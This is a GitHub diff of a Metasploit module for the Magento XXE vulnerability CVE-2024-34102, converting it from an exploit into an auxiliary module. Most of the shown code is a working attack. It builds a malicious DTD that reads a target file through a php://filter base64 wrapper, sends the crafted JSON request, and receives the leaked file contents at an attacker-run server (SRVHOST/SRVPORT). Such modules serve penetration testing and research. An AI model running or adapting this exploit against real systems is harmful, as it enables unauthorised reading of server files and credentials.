33# Current source: https://github.com/rapid7/metasploit-framework
44##
55
6- class MetasploitModule < Msf ::Exploit ::Remote
7- Rank = ExcellentRanking
6+ class MetasploitModule < Msf ::Auxiliary
87
98 include Msf ::Exploit ::Remote ::HttpClient
109 include Msf ::Exploit ::Remote ::HttpServer
11- prepend Msf ::Exploit ::Remote ::AutoCheck
10+
11+ CheckCode = Exploit ::CheckCode
1212
1313 def initialize ( info = { } )
1414 super (
@@ -29,13 +29,6 @@ def initialize(info = {})
2929 [ 'URL' , 'https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md' ]
3030 ] ,
3131 'DisclosureDate' => '2024-06-11' ,
32- 'Privileged' => false ,
33- 'Arch' => ARCH_PHP ,
34- 'Platform' => 'php' ,
35- 'Targets' => [
36- [ 'Magento' , { } ]
37- ] ,
38- 'DefaultTarget' => 0 ,
3932 'Notes' => {
4033 'Stability' => [ CRASH_SAFE ] ,
4134 'Reliability' => [ ] ,
@@ -85,34 +78,34 @@ def check
8578 end
8679
8780 def ent_eval
88- @ent_eval ||= rand_text_alpha_lower ( 4 ..8 )
81+ @ent_eval ||= Rex :: Text . rand_text_alpha_lower ( 4 ..8 )
8982 end
9083
9184 def leak_param_name
92- @leak_param_name ||= rand_text_alpha_lower ( 4 ..8 )
85+ @leak_param_name ||= Rex :: Text . rand_text_alpha_lower ( 4 ..8 )
9386 end
9487
9588 def dtd_param_name
96- @dtd_param_name ||= rand_text_alpha_lower ( 4 ..8 )
89+ @dtd_param_name ||= Rex :: Text . rand_text_alpha_lower ( 4 ..8 )
9790 end
9891
9992 def make_xxe_dtd
10093 filter_path = "php://filter/convert.base64-encode/resource=#{ datastore [ 'TARGETFILE' ] }
101- ent_file = rand_text_alpha_lower ( 4 ..8 )
94+ ent_file = Rex :: Text . rand_text_alpha_lower ( 4 ..8 )
10295 %(
10396 <!ENTITY % #{ ent_file } #{ filter_path }
10497 <!ENTITY % #{ dtd_param_name } #{ ent_eval } #{ datastore [ 'SRVHOST' ] } #{ datastore [ 'SRVPORT' ] } #{ leak_param_name } #{ ent_file }
10598 )
10699 end
107100
108101 def xxe_xml_data
109- param_entity_name = rand_text_alpha_lower ( 4 ..8 )
102+ param_entity_name = Rex :: Text . rand_text_alpha_lower ( 4 ..8 )
110103
111104 xml = "<?xml version='1.0' ?>"
112- xml += "<!DOCTYPE #{ rand_text_alpha_lower ( 4 ..8 ) }
105+ xml += "<!DOCTYPE #{ Rex :: Text . rand_text_alpha_lower ( 4 ..8 ) }
113106 xml += '['
114- xml += " <!ELEMENT #{ rand_text_alpha_lower ( 4 ..8 ) }
115- xml += " <!ENTITY % #{ param_entity_name } #{ datastore [ 'SRVHOST' ] } #{ datastore [ 'SRVPORT' ] } #{ rand_text_alpha_lower ( 4 ..8 ) } #{ param_entity_name } #{ dtd_param_name }
107+ xml += " <!ELEMENT #{ Rex :: Text . rand_text_alpha_lower ( 4 ..8 ) }
108+ xml += " <!ENTITY % #{ param_entity_name } #{ datastore [ 'SRVHOST' ] } #{ datastore [ 'SRVPORT' ] } #{ Rex :: Text . rand_text_alpha_lower ( 4 ..8 ) } #{ param_entity_name } #{ dtd_param_name }
116109 xml += ']'
117110 xml += "> <r>&#{ ent_eval }
118111
@@ -122,12 +115,12 @@ def xxe_xml_data
122115 def xxe_request
123116 vprint_status ( 'Sending XXE request' )
124117
125- signature = rand_text_alpha ( 6 ) . capitalize
118+ signature = Rex :: Text . rand_text_alpha ( 6 ) . capitalize
126119
127120 post_data = <<~EOF
128121 {
129122 "address": {
130- "#{ signature } #{ rand_text_alpha_lower ( 4 ..8 ) }
123+ "#{ signature } #{ Rex :: Text . rand_text_alpha_lower ( 4 ..8 ) }
131124 "totalsCollector": {
132125 "collectorList": {
133126 "totalCollector": {
@@ -156,7 +149,7 @@ def xxe_request
156149 fail_with ( Failure ::UnexpectedReply , 'Server might not be vulnerable' ) unless body [ 'parameters' ] [ 'fieldName' ] == signature
157150 end
158151
159- def exploit
152+ def run
160153 if datastore [ 'SSL' ]
161154 ssl_restore = true
162155 datastore [ 'SSL' ] = false
@@ -179,7 +172,7 @@ def exploit
179172 def on_request_uri ( cli , req )
180173 super
181174 data = ''
182-
175+
183176 case req . uri
184177 when /(.*).dtd/
185178 vprint_status ( "Received request for DTD file from #{ cli . peerhost } )
@@ -189,7 +182,7 @@ def on_request_uri(cli, req)
189182 if data &.empty?
190183 print_error ( 'No data received' )
191184 else
192-
185+
193186 file_name = datastore [ 'TARGETFILE' ]
194187 file_data = ::Base64 . decode64 ( data ) . force_encoding ( 'UTF-8' )
195188
0 commit comments